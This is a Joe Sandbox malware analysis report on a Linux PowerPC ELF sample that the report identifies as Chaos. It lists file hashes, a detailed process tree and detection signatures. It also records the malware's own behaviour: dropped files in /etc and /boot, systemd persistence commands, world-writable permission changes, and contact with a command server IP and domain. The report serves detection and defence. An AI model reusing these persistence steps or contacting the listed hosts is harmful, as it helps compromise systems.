Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
linux_ppc64el.elf

Overview

General Information

Sample name:linux_ppc64el.elf
Analysis ID:1562732
MD5:04893430bfaf82b24e726e9980c338b3
SHA1:9dfd9c35b547705b267b4c2acd5cb7699ba5edb5
SHA256:535b04d328da7b0be034710aeb74c4460c873d72ccf1e6e8186d4faf2e158c60
Tags:elfuser-abuse_ch
Infos:

Detection

Chaos
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Chaos
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Sample tries to set files in /etc globally writable
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1562732
Start date and time:2024-11-25 23:46:15 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:linux_ppc64el.elf
Detection:MAL
Classification:mal76.troj.evad.linELF@0/44@4/0

Warnings

  • VT rate limit hit for: linux_ppc64el.elf

Runtime Messages

Command:/tmp/linux_ppc64el.elf
PID:5483
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • linux_ppc64el.elf (PID: 5483, Parent: 5411, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /tmp/linux_ppc64el.elf
    • bash (PID: 5490, Parent: 5483, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c /etc/32678&
      • bash New Fork (PID: 5503, Parent: 5490)
      • 32678 (PID: 5503, Parent: 2955, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 5514, Parent: 5503)
        • sleep (PID: 5514, Parent: 5503, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
    • service (PID: 5496, Parent: 5483, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 5507, Parent: 5496)
      • basename (PID: 5507, Parent: 5496, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5515, Parent: 5496)
      • basename (PID: 5515, Parent: 5496, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5516, Parent: 5496)
      • systemctl (PID: 5516, Parent: 5496, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 5528, Parent: 5496)
        • service New Fork (PID: 5530, Parent: 5528)
        • systemctl (PID: 5530, Parent: 5528, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 5531, Parent: 5528)
        • sed (PID: 5531, Parent: 5528, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 5496, Parent: 2955, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • linux_ppc64el.elf (PID: 5501, Parent: 5483, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /tmp/linux_ppc64el.elf
      • update-rc.d (PID: 5526, Parent: 5501, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d linux_kill defaults
        • systemctl (PID: 5532, Parent: 5526, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • bash (PID: 5560, Parent: 5501, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 5562, Parent: 5560)
        • systemctl (PID: 5562, Parent: 5560, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 5566, Parent: 5560)
        • systemctl (PID: 5566, Parent: 5560, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable linux.service
        • bash New Fork (PID: 5570, Parent: 5560)
        • systemctl (PID: 5570, Parent: 5560, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start linux.service
        • bash New Fork (PID: 5764, Parent: 5560)
        • journalctl (PID: 5764, Parent: 5560, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
  • systemd New Fork (PID: 5542, Parent: 5541)
  • snapd-env-generator (PID: 5542, Parent: 5541, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5564, Parent: 5563)
  • snapd-env-generator (PID: 5564, Parent: 5563, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5568, Parent: 5567)
  • snapd-env-generator (PID: 5568, Parent: 5567, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5571, Parent: 1)
  • System.img.config (PID: 5571, Parent: 1, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /boot/System.img.config
    • pkill (PID: 5599, Parent: 5571, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
    • sh (PID: 5742, Parent: 5571, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
      • sh New Fork (PID: 5755, Parent: 5742)
      • 32678 (PID: 5755, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
        • 32678 New Fork (PID: 5763, Parent: 5755)
        • sleep (PID: 5763, Parent: 5755, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
        • 32678 New Fork (PID: 5806, Parent: 5755)
        • id.services.conf (PID: 5806, Parent: 5755, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /etc/id.services.conf
          • pkill (PID: 5812, Parent: 5806, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 32678
          • sh (PID: 5820, Parent: 5806, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /etc/32678&
            • sh New Fork (PID: 5827, Parent: 5820)
            • 32678 (PID: 5827, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/32678
              • 32678 New Fork (PID: 5837, Parent: 5827)
              • sleep (PID: 5837, Parent: 5827, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 60
          • service (PID: 5825, Parent: 5806, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
            • service New Fork (PID: 5836, Parent: 5825)
            • basename (PID: 5836, Parent: 5825, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5838, Parent: 5825)
            • basename (PID: 5838, Parent: 5825, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 5839, Parent: 5825)
            • systemctl (PID: 5839, Parent: 5825, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 5844, Parent: 5825)
              • service New Fork (PID: 5845, Parent: 5844)
              • systemctl (PID: 5845, Parent: 5844, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 5846, Parent: 5844)
              • sed (PID: 5846, Parent: 5844, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
          • systemctl (PID: 5825, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
          • id.services.conf (PID: 5831, Parent: 5806, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /etc/id.services.conf
    • service (PID: 5748, Parent: 5571, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service crond start
      • service New Fork (PID: 5762, Parent: 5748)
      • basename (PID: 5762, Parent: 5748, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5765, Parent: 5748)
      • basename (PID: 5765, Parent: 5748, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 5766, Parent: 5748)
      • systemctl (PID: 5766, Parent: 5748, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 5772, Parent: 5748)
        • service New Fork (PID: 5773, Parent: 5772)
        • systemctl (PID: 5773, Parent: 5772, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 5774, Parent: 5772)
        • sed (PID: 5774, Parent: 5772, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 5748, Parent: 1, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
    • System.img.config (PID: 5756, Parent: 5571, MD5: e179f86e81efbe80815812cd0b663076) Arguments: /boot/System.img.config
  • sshd New Fork (PID: 5601, Parent: 940)
  • sshd (PID: 5601, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5602, Parent: 940)
  • sshd (PID: 5602, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5603, Parent: 940)
  • sshd (PID: 5603, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5607, Parent: 5603)
  • sshd New Fork (PID: 5604, Parent: 940)
  • sshd (PID: 5604, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5609, Parent: 5604)
  • sshd New Fork (PID: 5619, Parent: 940)
  • sshd (PID: 5619, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
  • sshd New Fork (PID: 5666, Parent: 940)
  • sshd (PID: 5666, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5700, Parent: 5666)
  • sshd New Fork (PID: 5699, Parent: 940)
  • sshd (PID: 5699, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5724, Parent: 5699)
  • sshd New Fork (PID: 5727, Parent: 940)
  • sshd (PID: 5727, Parent: 940, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D -R
    • sshd New Fork (PID: 5741, Parent: 5727)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
ChaosMulti-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
linux_ppc64el.elfJoeSecurity_ChaosGoYara detected ChaosJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /etc/id.services.confJoeSecurity_ChaosGoYara detected ChaosJoe Security
      /boot/System.img.configJoeSecurity_ChaosGoYara detected ChaosJoe Security

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: linux_ppc64el.elfReversingLabs: Detection: 42%
        Source: /tmp/linux_ppc64el.elf (PID: 5501)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5812)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

        Networking

        barindex
        Connects to many ports of the same IP (likely port scanning)
        Source: global trafficTCP traffic: 103.135.101.78 ports 808,52462,2,4,5,6
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 47700 -> 808
        Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 47700
        Source: global trafficTCP traffic: 192.168.2.14:42412 -> 103.135.101.78:52462
        Source: /tmp/linux_ppc64el.elf (PID: 5501)Reads hosts file: /etc/hostsJump to behavior
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /password.txt HTTP/1.1Host: 103.135.101.78:808User-Agent: Go-http-client/1.1Accept-Encoding: gzip
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http2: Transport conn %p received error from processing frame %v: %vhttp2: Transport received unsolicited DATA frame; closing connectionhttp: message cannot contain multiple Content-Length headers; got %qpadding bytes must all be zeros unless AllowIllegalWrites is enabledreflect: reflect.Value.UnsafePointer on an invalid notinheap pointerhttp2: Transport closing idle conn %p (forSingleUse=%v, maxStream=%v)tls: handshake message of length %d bytes exceeds maximum of %d bytestls: peer doesn't support the certificate custom signature algorithmsbytes.Buffer: UnreadByte: previous operation was not a successful readcannot convert slice with length %y to pointer to array with length %xgot %s for stream %d; expected CONTINUATION following %s for stream %dx509: PKCS#8 wrapping contained private key with unknown algorithm: %vx509: certificate relies on legacy Common Name field, use SANs insteadMozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)Sogou Pic Spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm#07)Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)dynamic table size update MUST occur at the beginning of a header blockssh: no common algorithm for %s; client offered: %v, server offered: %vtls: peer doesn't support any of the certificate's signature algorithmstoo many concurrent operations on a single file or socket (max 1048575)x509: issuer has name constraints but leaf doesn't have a SAN extensionMozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)tls: server's certificate contains an unsupported type of public key: %Ttls: received unexpected handshake message of type %T when waiting for %T91289437fa036b34da55d57af6192768c27bd433fa012169d626d934e0051b24dd67dd3cf49d7cc827bc012d259d7ac226e70829239d7ac226e7082968de60d520eb433722c07fd236f6crypto/elliptic: internal error: Unmarshal rejected a valid point encodingmalformed response from server: malformed non-numeric status pseudo headernet/http: server replied with more than declared Content-Length; truncatedtls: certificate RSA key size too small for supported signature algorithmsUnsolicited response received on idle HTTP channel starting with %q; err=%vtls: internal error: attempted to read record with pending application datatls: failed to send closeNotify alert (but connection was closed anyway): %wtls: server certificate contains incorrect key type for selected ciphersuite((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}MapIter.Next called on an iterator that does not have an associated map Valuecrypto/tls: ExportKeyingMaterial is unavailable when renegotiation is enabled115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951ssh: internal error: algorithmSignerWrapper invoked with non-default algorithmssh: unable to authenticate, attempted methods %v, no supported methods remainx509: signature check attempt
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http: RoundTripper implementation (%T) returned a nil *Response with a nil errortls: either ServerName or InsecureSkipVerify must be specified in the tls.Configx509: invalid signature: parent certificate cannot sign this kind of certificaterefusing to use HTTP_PROXY value in CGI environment; see golang.org/s/cgihttpproxyx509: a root or intermediate certificate is not authorized to sign for this name: (possibly because of %q while trying to verify candidate authority certificate %q)Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)x509: issuer has name constraints but leaf contains unknown or unconstrained name: tls: downgrade attempt detected, possibly due to a MitM attack or a broken middleboxx509: signature algorithm specifies an %s public key, but have public key of type %Treflect.Value.Interface: cannot return value obtained from unexported field or methodx509: failed to parse private key (use ParseECPrivateKey instead for this key format)Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/;)reflect: New of type that may not be allocated in heap (possibly undefined cgo C type)x509: a root or intermediate certificate is not authorized for an extended key usage: fxfzUc6gtMGc/i26ld3KydGKy1k7QqyMMyxjbU1Rlk+F9LQxnaTeCHGHsDUpaBeOWDeY6l+2kHlB7EWTLcGwfg==whv+Kf1cEtOXzr+zuvmef2as0WfbUDm8l2LMWBMel10NDnbShg9CsMUt327VJhOTbXLoPYJVTKy8MBPCVwoT8A==x509: failed to parse private key (use ParsePKCS1PrivateKey instead for this key format)x509: failed to parse private key (use ParsePKCS8PrivateKey instead for this key format)Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)http2: server sent GOAWAY and closed the connection; LastStreamID=%v, ErrCode=%v, debug=%qapplication/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5tls: handshake hash for a client certificate requested after discarding the handshake buffertls: unsupported certificate: private key is *ed25519.PrivateKey, expected ed25519.PrivateKey3617de4a96262c6f5d9e98bf9292dc29f8f41dbd289a147ce9da3113b5f0b8c00a60b1ce1d7e819d7a431d7c90ea0e5faa87ca22be8b05378eb1c71ef320ad746e1d3b628ba79b9859f741e082542a385502f25dbf55296c3a545e3872760ab7b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120314088f5013875ac656398d8a2ed19d2a85c8edd3ec2aefhttp: RoundTripper implementation (%T) returned a *Response with content length %d but a nil BodyNoClientCertRequestClientCertRequireAnyClientCertVerifyClientCertIfGivenRequireAndVerifyClientCertcipher: the nonce can't have zero length, or the security of the key will be immediately compromisedssh<<RMS>> equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: aras.liveya.org
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)x509:
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://search.msn.com/msnbot.htm
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.baidu.com/search/spider.html)
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829
        Source: id.services.conf.12.drString found in binary or memory: http://www.baidu.com/search/spider.html)Mozilla/5.0
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.baidu.com/search/spider.html)http2:
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.entireweb.com/about/search_tech/speedy_spider/)text/html
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.google.com/mobile/adsbot.html)
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.haosou.com/help/help_3_2.htmlMozilla/5.0
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://www.youdao.com/help/webmaster/spider/;)reflect:
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: http://yandex.com/bots)http:
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: https://search.yahoo.com/search?p=illegal
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: https://www.baidu.com/s?wd=insufficient
        Source: linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drString found in binary or memory: https://www.so.com/s?q=index
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /usr/bin/pkill (PID: 5599)SIGKILL sent: pid: 5503, result: successfulJump to behavior
        Source: /usr/bin/pkill (PID: 5812)SIGKILL sent: pid: 5755, result: successfulJump to behavior
        Source: classification engineClassification label: mal76.troj.evad.linELF@0/44@4/0
        Source: ELF file sectionSubmission: linux_ppc64el.elf
        Source: ELF file sectionDropped file: id.services.conf.12.dr
        Source: ELF file sectionDropped file: System.img.config.19.dr

        Persistence and Installation Behavior

        barindex
        Sample tries to set files in /etc globally writable
        Source: /tmp/linux_ppc64el.elf (PID: 5483)File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5483)File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Writes identical ELF files to multiple locations
        Source: /tmp/linux_ppc64el.elf (PID: 5501)File with SHA-256 535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60 written: /boot/System.img.configJump to dropped file
        Source: /tmp/linux_ppc64el.elf (PID: 5483)File with SHA-256 535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60 written: /etc/id.services.confJump to dropped file
        Source: /tmp/linux_ppc64el.elf (PID: 5501)File: /dev/.oldJump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5501)File: /dev/.imgJump to behavior
        Source: /etc/id.services.conf (PID: 5831)File: /dev/.oldJump to behavior
        Source: /etc/id.services.conf (PID: 5831)File: /dev/.imgJump to behavior
        Source: /boot/System.img.config (PID: 5756)File: /dev/.oldJump to behavior
        Source: /boot/System.img.config (PID: 5756)File: /dev/.imgJump to behavior
        Source: /boot/System.img.config (PID: 5756)Empty hidden file: /dev/.oldJump to behavior
        Source: /boot/System.img.config (PID: 5756)Empty hidden file: /dev/.imgJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1583/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1583/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/2672/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/2672/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/110/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/110/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3759/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3759/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/111/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/111/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/112/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/112/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/113/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/113/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/234/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/234/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1577/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1577/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/114/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/114/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/235/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/235/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/115/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/115/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/116/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/116/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/117/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/117/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/118/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/118/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/119/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/119/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3756/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3756/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3757/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3757/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/10/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/10/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/917/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/917/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3758/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3758/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/11/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/11/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/12/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/12/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/13/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/13/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/14/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/14/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/15/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/15/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/16/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/16/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/17/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/17/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/18/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/18/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/19/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/19/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1593/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1593/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/240/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/240/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/120/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/120/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3094/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3094/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/121/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/121/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/242/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/242/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3406/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3406/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1/statusJump to behavior
